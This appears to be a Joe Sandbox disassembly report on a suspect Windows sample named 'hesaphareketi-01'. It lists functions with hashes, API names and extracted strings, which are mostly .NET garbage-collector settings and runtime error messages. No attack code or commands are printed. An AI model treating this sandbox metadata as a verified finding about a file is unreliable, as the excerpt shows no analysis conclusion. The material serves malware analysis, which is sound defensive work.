                                                  • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCWriteBarrier$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
                                                  • API String ID: 0-658696054
                                                  • Opcode ID: 5d91cec8345dcd14847125137ea3c03a11dcadacceb965cd2ffe1bbf1cb37226
                                                  • Instruction ID: b3ec5d9b7d4965ddaaec48987e0ca1efd0a1cd788b8f356db3d72bb76bac6a9a
                                                  • Opcode Fuzzy Hash: 5d91cec8345dcd14847125137ea3c03a11dcadacceb965cd2ffe1bbf1cb37226
                                                  • Instruction Fuzzy Hash: 6E329F72A08A57A2EB68AF56FC90AA9A364FF457C8FC11136D98C53F24DF3CD2019714
                                                  Function 00007FF7341E3720 Relevance: 102.8, Strings: 82, Instructions: 270COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                                                  • API String ID: 0-2080704861
                                                  • Opcode ID: 1d9ea1ae8f7853fcbb2035dbdcf46aaac34e09551b1d5d4f4f36f9c21da8c312
                                                  • Instruction ID: 4455bb8e0129b268600fb97e804e79cbe7302804592aaea192f6a25a67079936
                                                  • Opcode Fuzzy Hash: 1d9ea1ae8f7853fcbb2035dbdcf46aaac34e09551b1d5d4f4f36f9c21da8c312
                                                  • Instruction Fuzzy Hash: C2F1D792E29947B0EE08FF57ECD01F4A365AF86310BC5407AD04DE70659E7CA649E3B4
                                                  Function 00007FF7341E2890 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                                                  • String ID: SeLockMemoryPrivilege
                                                  • API String ID: 1752251271-475654710
                                                  • Opcode ID: 1a2862dd90dccfa9a81e54bf5d2b295596dc0d2044562f65404962315b9e1cb2
                                                  • Instruction ID: 5c1c430c09f94b13ad46b00898d99c56344a92f364762969ed309638bacde55c
                                                  • Opcode Fuzzy Hash: 1a2862dd90dccfa9a81e54bf5d2b295596dc0d2044562f65404962315b9e1cb2
                                                  • Instruction Fuzzy Hash: 6131D635A0CA5292FB68AF62F89437AE7A1FF84B84F841039DA4D97754CE3DD444D720
                                                  Function 00007FF7341D7EC0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 248COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF7341D8880,?,?,?,?,?,?,?,?,?), ref: 00007FF7341D7F4B
                                                  • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF7341D8880,?,?,?,?,?,?,?,?,?), ref: 00007FF7341D80AA
                                                  • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF7341D8880,?,?,?,?,?,?,?,?,?), ref: 00007FF7341D81A0
                                                  • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF7341D8880,?,?,?,?,?,?,?,?,?), ref: 00007FF7341D81B6
                                                  • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF7341D8880,?,?,?,?,?,?,?,?,?), ref: 00007FF7341D8216
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFailFastRaise
                                                  • String ID: [ KeepUnwinding ]
                                                  • API String ID: 2546344036-400895726
                                                  • Opcode ID: 915c5e9101982ef85af9a43bc3cfe156fed0120c7793f84e5fde07d7cabb1885
                                                  • Instruction ID: 97e984fc0e202adb4403688058881808f34225ef3864d812f5122867e9725a75
                                                  • Opcode Fuzzy Hash: 915c5e9101982ef85af9a43bc3cfe156fed0120c7793f84e5fde07d7cabb1885
                                                  • Instruction Fuzzy Hash: B2C193B3609F42A5EF589F26E4802B973A1FB05B48F944135CE5D47368CF79E495D320
                                                  Function 00007FF7341D5270 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 193COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • The required instruction sets are not supported by the current CPU., xrefs: 00007FF7341D556E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFailFastRaise
                                                  • String ID: The required instruction sets are not supported by the current CPU.
                                                  • API String ID: 2546344036-3318624164
                                                  • Opcode ID: bf7b72df4d136d0aac6dca5c477934f391bb1e94f0d28fd6456ad0c696d7c5ec
                                                  • Instruction ID: e89219c3fffb3c5fcc4abbd69c69869c00f4fff7466b9db3a8c08822db3fec83
                                                  • Opcode Fuzzy Hash: bf7b72df4d136d0aac6dca5c477934f391bb1e94f0d28fd6456ad0c696d7c5ec
                                                  • Instruction Fuzzy Hash: AB71A2A2B1CA3666FFAC6F0EE4C0974A6A0AF13758FD0003CD40AD7A55DE3DB4506A61
                                                  Function 00007FF7341FDC30 Relevance: 2.0, APIs: 1, Instructions: 456COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BreakCounterCreateDebugEventPerformanceQuery
                                                  • String ID:
                                                  • API String ID: 4239280443-0
                                                  • Opcode ID: c34d052a868cd4b60924c0b1e92cbc460f46e007d6bb4a206f187a08c30cf7c3
                                                  • Instruction ID: 4ca2f6ea7f4cc0e5c5d0290277e352dcb261c783032708703f58bfa4e0c19e77
                                                  • Opcode Fuzzy Hash: c34d052a868cd4b60924c0b1e92cbc460f46e007d6bb4a206f187a08c30cf7c3
                                                  • Instruction Fuzzy Hash: 43420F32D09B42A5EB58AF26B8C0264B3A4FF56744F90523DD99CA3771DF3CA591E320
                                                  Function 00007FF734201800 Relevance: 1.9, Strings: 1, Instructions: 621COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: 170f8f4704fea771372d3c5e4c17b39ad4eafef7f37a81aab25316a8070dc8bd
                                                  • Instruction ID: 279d1f3980dc5910a3a270a4a62a38dfd96168bd73024b9cffe114f03f2fe745
                                                  • Opcode Fuzzy Hash: 170f8f4704fea771372d3c5e4c17b39ad4eafef7f37a81aab25316a8070dc8bd
                                                  • Instruction Fuzzy Hash: F852D932A08B86A6DA189F07E8D4278B3E5FF45794F940135DA5DA3790DF3EE450E321
                                                  Function 00007FF7341F7F10 Relevance: 1.7, Strings: 1, Instructions: 481COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}, xrefs: 00007FF7341F86FB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}
                                                  • API String ID: 0-2256439813
                                                  • Opcode ID: 061b6938f4016a34bcb0bd81591986c075d9c77a106380fc5b89187094526531
                                                  • Instruction ID: 93f7bdd9dc6c5b5647af9ed16ecce6111d46f1f0b731565789656e1055a7f8d0
                                                  • Opcode Fuzzy Hash: 061b6938f4016a34bcb0bd81591986c075d9c77a106380fc5b89187094526531
                                                  • Instruction Fuzzy Hash: 0042B832A0AB46A6EE59AF1AE4C0379B3A1FF05744F944139CA4D93361DF3DE462D720
                                                  Function 00007FF7341EE2F0 Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ?
                                                  • API String ID: 0-1684325040
                                                  • Opcode ID: 39d35dd192e213be530d99728a9c3530756a8bd52014cd6a83916c8dc71fdbc9
                                                  • Instruction ID: 470b5ba9b5d7e907aefb952bc7eb88a5ae5cd8388a2bbd1226f66f8ef37e0aa9
                                                  • Opcode Fuzzy Hash: 39d35dd192e213be530d99728a9c3530756a8bd52014cd6a83916c8dc71fdbc9
                                                  • Instruction Fuzzy Hash: D912003AA08F4292EA28EF03F484679B3A1FB45B94F944235DA5D93794DF3CE481D714
                                                  Function 00007FF7341DDD30 Relevance: 1.6, APIs: 1, Instructions: 55timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Time$FileSystem
                                                  • String ID:
                                                  • API String ID: 2086374402-0
                                                  • Opcode ID: 5c980d6ba46e3a73f0dcc2ee7f1a165251c54b4aeab7c0793880b0067312ad67
                                                  • Instruction ID: c12cc9161d148d02d6932aa758d479055721f641a064f269e33710a0e5e90e08
                                                  • Opcode Fuzzy Hash: 5c980d6ba46e3a73f0dcc2ee7f1a165251c54b4aeab7c0793880b0067312ad67
                                                  • Instruction Fuzzy Hash: 53212832A08B42A7EF48EF66F880269B2E0EB4A340F84413DE54D93351DF3DA5409760
                                                  Function 00007FF7341F40D0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CounterPerformanceQuery
                                                  • String ID:
                                                  • API String ID: 2783962273-3916222277
                                                  • Opcode ID: d52441a9fe127e5d59a6260759f4b20b6237ae2c80609afff28cd25b6676035c
                                                  • Instruction ID: 9bdcad5af30c3a80de1198ba5b65a5d139dc22394d842d683440eb885e208f1b
                                                  • Opcode Fuzzy Hash: d52441a9fe127e5d59a6260759f4b20b6237ae2c80609afff28cd25b6676035c
                                                  • Instruction Fuzzy Hash: E3D1E662A1DE4691EA18AF26F480279A3D0FF51BA4F844335DB6D937D4CF3CE442A310
                                                  Function 00007FF7341E69D0 Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: X@2
                                                  • API String ID: 0-2772482207
                                                  • Opcode ID: 2c5450eb009bbb477380e5294b5de819db12dd9e00ce9680b9f4d20b2e4ec7d5
                                                  • Instruction ID: 6f95bef056c37f4f7d3565f3f8251fc8f584a9b0e19d93000d5da504234f6c61
                                                  • Opcode Fuzzy Hash: 2c5450eb009bbb477380e5294b5de819db12dd9e00ce9680b9f4d20b2e4ec7d5
                                                  • Instruction Fuzzy Hash: B0917036E1DB42A6EA28AF16F8C0369B3A0FB46744FD04139D94D93360DF3CE491A714
                                                  Function 00007FF734202700 Relevance: .9, Instructions: 945COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d9884e8459a2da4eee788d28edbed6ad75013be01f180accf8dedfb5a0459d2e
                                                  • Instruction ID: 17e3cd80659a790a2cc54ec84a5a67f3d739b7ffbcb10434a6b060861d88e293
                                                  • Opcode Fuzzy Hash: d9884e8459a2da4eee788d28edbed6ad75013be01f180accf8dedfb5a0459d2e
                                                  • Instruction Fuzzy Hash: D392A162A18B4665EE49BF57A9C4674E3D5BF46BC0F84413AD80EF3360DE3DE841A321
                                                  Function 00007FF734203600 Relevance: .6, Instructions: 626COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 549e6052dfb5f75015054c6104143178bc8924d384410c045d17cae26b1dd661
                                                  • Instruction ID: 6d5b7efbaa4c35c8d77bd0164499130bcf281029e2dd30101034bc44e89153bc
                                                  • Opcode Fuzzy Hash: 549e6052dfb5f75015054c6104143178bc8924d384410c045d17cae26b1dd661
                                                  • Instruction Fuzzy Hash: FF42DF32B08B4696EB18AF26E4845ACB7F1FB44B88F440536EE4DA7B58CE3DE441D711
                                                  Function 00007FF734203F70 Relevance: .6, Instructions: 583COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7bc02a47b9c6b537f87ba7f03e9d8996afc695ebb4e05c8f65f414fc91164dd3
                                                  • Instruction ID: aa3b3af9c88b347535baa0422fa8fd936f34a1faf91495ee55cd6ecb01088809
                                                  • Opcode Fuzzy Hash: 7bc02a47b9c6b537f87ba7f03e9d8996afc695ebb4e05c8f65f414fc91164dd3
